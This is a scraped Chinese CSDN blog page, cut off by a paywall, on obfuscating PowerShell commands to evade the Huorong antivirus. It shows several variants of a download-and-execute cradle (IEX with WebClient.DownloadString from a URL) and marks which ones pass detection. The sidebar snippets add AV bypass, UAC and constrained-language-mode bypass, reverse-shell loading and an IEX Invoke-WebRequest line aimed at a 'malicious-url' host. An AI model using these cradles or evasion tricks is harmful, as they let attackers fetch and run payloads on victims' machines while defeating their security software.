powershell命令语句混淆免杀(bypass火绒)

最新推荐文章于 2024-08-20 22:22:11 发布
最新推荐文章于 2024-08-20 22:22:11 发布
阅读量1.3k 收藏
点赞数
分类专栏: cs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43899495/article/details/113657853
版权
本文介绍了如何使用基础混淆方法来避免火绒安全软件检测到PowerShell命令,包括替换对象名、拆分URL字符串、定义变量、替换函数调用以及使用Invoke方法。提供了多个实例展示这些混淆技术的应用,以实现命令的免杀执行。
摘要由CSDN通过智能技术生成

基础混淆

原始语句(不免杀)
powershell “IEX (New-Object System.Net.WebClient).DownloadString(‘http://127.0.0.1/a.ps1’)"

AV:火绒

混淆测试
New-Object System.Net 类可以直接替换成 New-Object Net 类(不免杀)

powershell "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/a.ps1')"

对于 DownloadString 函数中的 URL 字符串可以采用直接拼接的方式进行组合和拆分(不免杀)

powershll "IEX (New-Object Net.WebClient).DownloadString('ht'+'tp://127.0.0.1/a.ps1')"

定义一个变量,其值赋为New-Object(免杀)

powershell "$w=(New-Object Net.WebClient);IEX $w.DownloadString('ht'+'tp://127.0.0.1/a.ps1')"

用字符串DownloadString替换 DownloadString()函数(免杀)

powershell "IEX (New-Object Net.WebClient).('DownloadString')('h'+'ttp://127.0.0.1/a.ps1')"

使用 Invoke 调用方法(免杀)


                

                
                
        

        

    

  


        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  老鄧头
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
免杀对抗—Powershell混淆&分离免杀&特征修改&填充替换

				
			

			

				

					2301_76227305的博客
				

				

					09-30
					
					772
					
				

			

		

		

			
				
总的来说powershell免杀的效果要比shellcode要好,上面讲的方法都是通用的,在python混淆免杀的时候,也可以利用python进行分离免杀,或者无文件落地。免杀的思路远远不止这些,会有越来越多的免杀思路,而杀软也会不断迭代升级,二者是相互成长的。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。

			
		

	



                

              
                



	

		

			

				
					
bypass-clm:PowerShell受限语言模式绕过

				
			

			

				

					05-24
				

			

		

		

			
				
PowerShell受限语言模式绕过
这将生成一个可执行文件,即使启用了约束语言模式,该可执行文件也会执行完整语言模式powershell会话。 在撰写本文时,我发现的唯一绕过方法是降级为PowerShell版本2或使用.Net中的运行空间。 PowerShell版本2现在不再普遍可用,并且Runspaces本身不提供交互式界面。 该方法将提供完整的powershell会话,就像运行powershell.exe ,但始终处于完全语言模式。
 这是通过执行以下操作来完成的:
 我们在System.Management.Automation反射性地加载内部SystemPolicy类
我们确保静态方法GetSystemLockdownPolicy已由JIT引擎编译。
 我们检索已编译方法的函数指针。
 我们利用VirtualProtect来确保功能代码可写。
 我们用存根xor rax,rax;

			
		

	



                


  
              

                


	

		

			

				
					
powershell免杀学习:过360、火绒

				
			

			

				

					Keepb1ue的博客
				

				

					11-24
					
					9006
					
				

			

		

		

			
				
首先先通过msfvenon生成一个ps1脚本

使用到的脚本项目地址:
https://github.com/peewpw/Invoke-PSImage 
自己准备一张jpg图片


powershell默认是不允许加载外部脚本文件的,所以在打开powershell时需要用executionpolicy bypass参数来绕过策略的限制;然后import-module来导入invoke-psimage.ps1脚本; 利用工具通过powershell将生成的ps1脚本与test.jpg合成为shell.png

			
		

	





	

		

			

				
					
powershell免杀详解

					
最新发布

				
			

			

				

					m0_57836225的博客
				

				

					08-20
					
					923
					
				

			

		

		

			
				
也可以使用 `IEX (Invoke-WebRequest -Uri 'http://malicious-url/script.txt' -UseBasicParsing).Content`,通过 `Invoke-WebRequest`获取远程脚本内容并执行。- 解释:PowerShell 模块是一种组织和封装 PowerShell 代码的方式,`.psm1`文件包含函数、变量、别名等,可以将一组相关的功能打包在一起,以便在多个脚本中重复使用,提高代码的可维护性和可重用性。

			
		

	



		

			
		



	

		

			

				
					
Powershell tricks::Bypass AV

				
			

			

				

					weixin_34259232的博客
				

				

					03-08
					
					285
					
				

			

		

		

			
				
DM_ · 2014/10/27 10:320x00 Powershell 简介Powershell犹如linux下的bash,并且在windows中Powershell可以利用.NET Framework的强大功能,也可以调用windows API,在win7/server 2008以后,powershell已被集成在系统当中。 Powershell强大的功能特性给windows管理带来了极大的...

			
		

	





	

		

			

				
					
BypassUAC------利用PowerShell绕过UAC

				
			

			

				

					moonhillcity的博客
				

				

					10-20
					
					4452
					
				

			

		

		

			
				
转自:http://www.freebuf.com/articles/system/81286.html

背景介绍

UAC(User Account Control,用户帐户控制)是微软为提高系统安全而在Windows Vista中引入的新技术,它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限或管理员‌密码。通过在这些操作启动前对其进行验证,U

			
		

	





	

		

			

				
					
PowerShell脚本免杀/bypass/绕过杀毒软件

				
			

			

				

					wdsj_xh的博客
				

				

					05-12
					
					2346
					
				

			

		

		

			
				
项目地址:https://github.com/the-xentropy/xencrypt



原文链接:http://caidaome.com/?post=246

Xencrypt是一个PowerShell加密程序,以达到某些场景下免杀/bypass/绕过杀毒软件的效果。厌倦了浪费大量时间混淆诸如invoke-mimikatz之类的PowerShell脚本,以至于无论如何都无法检测到它们?如果您可以采用任何脚本并自动且几乎不费力地生成几乎无限数量的变体来击败基于签名的防病毒检测机制,那岂不是很棒吗?.

			
		

	





	

		

			

				
					
Ladon九种PowerShell命令混淆加密免杀方法

				
			

			

				

					K8哥哥
				

				

					11-02
					
					1719
					
				

			

		

		

			
				
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。
Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。
Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能
管理员想反查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。
更新功能
GUI 2020.10.18
[+] PowerShell转EXE,EXE转PowerShell
EXE->Powershell
PowerS

			
		

	





	

		

			

				
					
红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?

				
			

			

				

					Ms08067安全实验室
				

				

					09-01
					
					1489
					
				

			

		

		

			
				
文章来源|MS08067 红队培训班第12节课作业本文作者:某学员A(红队培训班1期学员)按老师要求尝试完成布置的作业如下:一、远程线程注入(一)通过MSF生成payload通过msfve...

			
		

	





	

		

			

				
					
〖教程〗Ladon九种PowerShell混淆免杀方法

				
			

			

				

					K8哥哥
				

				

					07-15
					
					974
					
				

			

		

		

			
				
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。
Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。
Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能
管理员想反查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。

更新功能
GUI 2020.10.18
[+] PowerShell转EXE,EXE转PowerShell
EXE->Powershell
Power

			
		

	





	

		

			

				
					
PowerShell脚本免杀/bypass/绕过杀毒软件,ReconFTW 漏洞扫描

				
			

			

				

					代码讲故事
				

				

					09-16
					
					586
					
				

			

		

		

			
				
PowerShell脚本免杀/bypass/绕过杀毒软件,ReconFTW 漏洞扫描。

			
		

	





	

		

			

				
					
探索技术新星:Powershell_bypassAV —— 深度解析与应用指南

				
			

			

				

					gitblog_00043的博客
				

				

					04-23
					
					727
					
				

			

		

		

			
				
探索技术新星:Powershell_bypassAV —— 深度解析与应用指南
项目地址:https://gitcode.com/komomon/Powershell_bypassAV

在网络安全领域,绕过反病毒软件(AV)的技术一直是研究的重点。今天我们要探讨的是一个名为Powershell_bypassAV的项目,它是一个利用PowerShell脚本实现反病毒检测规避的工具。本文将详细介绍该...

			
		

	





	

		

			

				
					
powershell绕过执行策略

				
			

			

				

					内心不种满鲜花就会长满杂草
				

				

					02-24
					
					1778
					
				

			

		

		

			
				
PowerShell是为系统管理员设计的基于任务的自动化命令行外壳(Shell)和相关脚本环境。 它建立在.NET框架上。 它是比命令提示符(cmd)强大的命令行解释器,可以解释PowerShell和批处理命令powershell一直都是内网渗透的大热门,微软是真正的在推行PowerShell,包括Office等更多自家软件,底层都是调用PowerShell来实现,近年来利用powershell来搞内网渗透进行横向或免杀的热度一直居高不下。

posershell历史:PowerShell历史

			
		

	





	

		

			

				
					
Powershell绕过执行及脚本混淆

				
			

			

				

					hl1293348082的专栏
				

				

					03-28
					
					1298
					
				

			

		

		

			
				
为什么需要 powershell ?存在必然合理。微软的服务器操作系统因为缺乏一个强大的 Shell 备受诟病。而与之相对,Linux 的 Shell 可谓丰富并且强大。



Windows Server 的 Shell,也就是从 Dos 继承过来的命令行,处理简单问题尚可,一旦遇到稍微复杂一点的问题,它就会把本已复杂的问题,弄得更加复杂。

引入 VBScript,使得 WindowsServer 管理员处理问题的效率提高了不少。但 VBScript 是个脚本语言,即缺乏 Shell 的简单性,也不能.

			
		

	





	

		

			

				
					
Windows系统反弹shell常见方法总结

				
			

			

				

					Bird&Bird
				

				

					07-17
					
					3738
					
				

			

		

		

			
				
目录一、Powercat反弹shell二、Nishang反弹shell三、UDP反弹shell四、Metasploit反弹shell五、nc反弹
一、Powercat反弹shell
powercat下载: powercat.
powercat 是一个  函数。首先,需要先加载该函数,然后才能执行它。加载方式有两种:
其一:下载powercat.ps1至本地,并加载

其二:从URL加载
powershell IEX (New-Object System.Net.Webclient).DownloadStri

			
		

	





	

		

			

				
					
webclient无法获取html文件,Webclient.DownloadFile().aspx文件无法打开(Webclient.Down

				
			

			

				

					weixin_31937913的博客
				

				

					06-10
					
					483
					
				

			

		

		

			
				
我使用PowerShell首次。  我已经学会了如何使用Web客户端,使用下面的代码来下载文件。$client = New-Object System.NET.Webclient$client.DownloadFile( $url, $path )这似乎很好地为我所试图做的,最终,这是一次从网页下载多个文件。  我想这在网站上,有其格式化为.pfva文件,这些文件被打开的PDF文件。  没问题。 ...

			
		

	





	

		

			

				
					
Powershell免杀

				
			

			

				

					mingyqf的博客
				

				

					05-11
					
					2462
					
				

			

		

		

			
				
Powershell免杀
本文作者:Chenw
本文链接:https://www.cnblogs.com/chen-w/p/14726549.html
0x01 前言
前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线。然后被杀软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个免杀的方法。

后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行免杀,后面思想大同小异)于是做了这个小笔记。

0x02 Powershell免杀思路
先介绍一下powershell木马最常用的方式

			
		

	





	

		

			

				
					
Powershell安全技术简单介绍

				
			

			

				

					W小哥
				

				

					04-08
					
					793
					
				

			

		

		

			
				
Powershell基本概念
参考百度百科的解释:
Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。
它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。
Windows PowerShell v3将伴随着Microsoft Hyper-V 3.0和Windows Server 2012发布。PowerShell 

			
		

	





	

		

			

				
					

				
			

			

				

					
				

			

		

		

			
				

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值